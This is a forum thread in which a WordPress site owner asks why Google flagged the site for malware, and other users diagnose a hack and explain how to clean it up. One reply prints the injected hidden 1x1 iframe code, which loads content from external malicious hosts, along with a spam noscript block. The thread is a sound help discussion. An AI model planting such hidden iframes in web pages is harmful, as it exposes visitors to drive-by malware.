> I got a notification for "malware" on my site.  But I don't know what
> Google is thinking is malware.  I know I did not purposly put anything
> up there.  And I checked the page and don't see anything.  Help!  Can
> anyone tell me what Google is seeing that is malware???

> My site that it's seeing the malware on is: myworthlesscrap.com/
> PhotoBlog

> My main site is just myworthlesscrap.com

> A big thanks to anyone that can figure this one out!!!

> At least one page (www . myworthlesscrap . com / PhotoBlog /) has two
> suspicious iframes. One is embedded in some text that says, "I've
> never met such a demanding fortune cookie!", and gets its content from
> http: // www . wp-stats-php . info/iframe/wp-stats.php . To research
> that, do a web search on "www . wp-stats-php.info" (except remove the
> spaces first). It's being talked about, including in other posts here
> in this forum. The other iframe gets its content from http : //
> 61.132.75.71 / iframe/wp-stats.php.

> On Feb 12, 6:50 am, "C.R." <ned4spd8...@gmail.com> wrote:

> > I got a notification for "malware" on my site.  But I don't know what
> > Google is thinking is malware.  I know I did not purposly put anything
> > up there.  And I checked the page and don't see anything.  Help!  Can
> > anyone tell me what Google is seeing that is malware???

> > My site that it's seeing the malware on is: myworthlesscrap.com/
> > PhotoBlog

> > My main site is just myworthlesscrap.com

> > A big thanks to anyone that can figure this one out!!!

> Hmm...I'll have to look into that when I get home.  I wonder if it has
> to do with word press page stats or something???

> On Feb 12, 4:57 pm, SteveW <steve2...@yahoo.com> wrote:

> > At least one page (www . myworthlesscrap . com / PhotoBlog /) has two
> > suspicious iframes. One is embedded in some text that says, "I've
> > never met such a demanding fortune cookie!", and gets its content from
> > http: // www . wp-stats-php . info/iframe/wp-stats.php . To research
> > that, do a web search on "www . wp-stats-php.info" (except remove the
> > spaces first). It's being talked about, including in other posts here
> > in this forum. The other iframe gets its content from http : //
> > 61.132.75.71 / iframe/wp-stats.php.

> > On Feb 12, 6:50 am, "C.R." <ned4spd8...@gmail.com> wrote:

> > > I got a notification for "malware" on my site.  But I don't know what
> > > Google is thinking is malware.  I know I did not purposly put anything
> > > up there.  And I checked the page and don't see anything.  Help!  Can
> > > anyone tell me what Google is seeing that is malware???

> > > My site that it's seeing the malware on is: myworthlesscrap.com/
> > > PhotoBlog

> > > My main site is just myworthlesscrap.com

> > > A big thanks to anyone that can figure this one out!!!

> C.R.:

> I assume you are using WordPress.  I had the same problem with
> WordPress 2.3.2.  My sites were hacked and the following code was
> inserted into the posts on the home page:

> <!-- Traffic Statistics --> <iframe src="http://61.132.75.71/iframe/
> wp-
> stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End
> Traffic Statistics -->

> <!-- Traffic Statistics --> <iframe src="http://www.wp-stats-php.info/
> iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
> <!-- End Traffic Statistics -->

> <noscript>Embora nós tenhamos &amp;lt;a href="http://www.super-
> toques.com/geral-toques-para-telefone.html"&amp;gt;http://www.super-
> toques.com&amp;lt;/a&amp;gt; para o mac.</noscript>

> Here is how I cleaned them out.  In the WP blog, go to Site Admin and
> then to Manage.  Search for "Traffic Statistics" or iframe, and also
> for noscript.  Edit the postings listed in response to the searches
> using the code tab, not the visual tab.  Delete the offending code.

> Also, check out your list of users users.  You probably will find one
> or two bogus users that you need to delete.  WordPress version 2.3.3
> changes the XMLPRC.PHP file, which may fix the exploit.  See:http://wordpress.org/development/

> Good luck.

> Ty H.

> On Feb 13, 8:46 am, "C.R." <ned4spd8...@gmail.com> wrote:

> > Hmm...I'll have to look into that when I get home.  I wonder if it has
> > to do with word press page stats or something???

> > On Feb 12, 4:57 pm, SteveW <steve2...@yahoo.com> wrote:

> > > At least one page (www . myworthlesscrap . com / PhotoBlog /) has two
> > > suspicious iframes. One is embedded in some text that says, "I've
> > > never met such a demanding fortune cookie!", and gets its content from
> > > http: // www . wp-stats-php . info/iframe/wp-stats.php . To research
> > > that, do a web search on "www . wp-stats-php.info" (except remove the
> > > spaces first). It's being talked about, including in other posts here
> > > in this forum. The other iframe gets its content from http : //
> > > 61.132.75.71 / iframe/wp-stats.php.

> > > On Feb 12, 6:50 am, "C.R." <ned4spd8...@gmail.com> wrote:

> > > > I got a notification for "malware" on my site.  But I don't know what
> > > > Google is thinking is malware.  I know I did not purposly put anything
> > > > up there.  And I checked the page and don't see anything.  Help!  Can
> > > > anyone tell me what Google is seeing that is malware???

> > > > My site that it's seeing the malware on is: myworthlesscrap.com/
> > > > PhotoBlog

> > > > My main site is just myworthlesscrap.com

> > > > A big thanks to anyone that can figure this one out!!!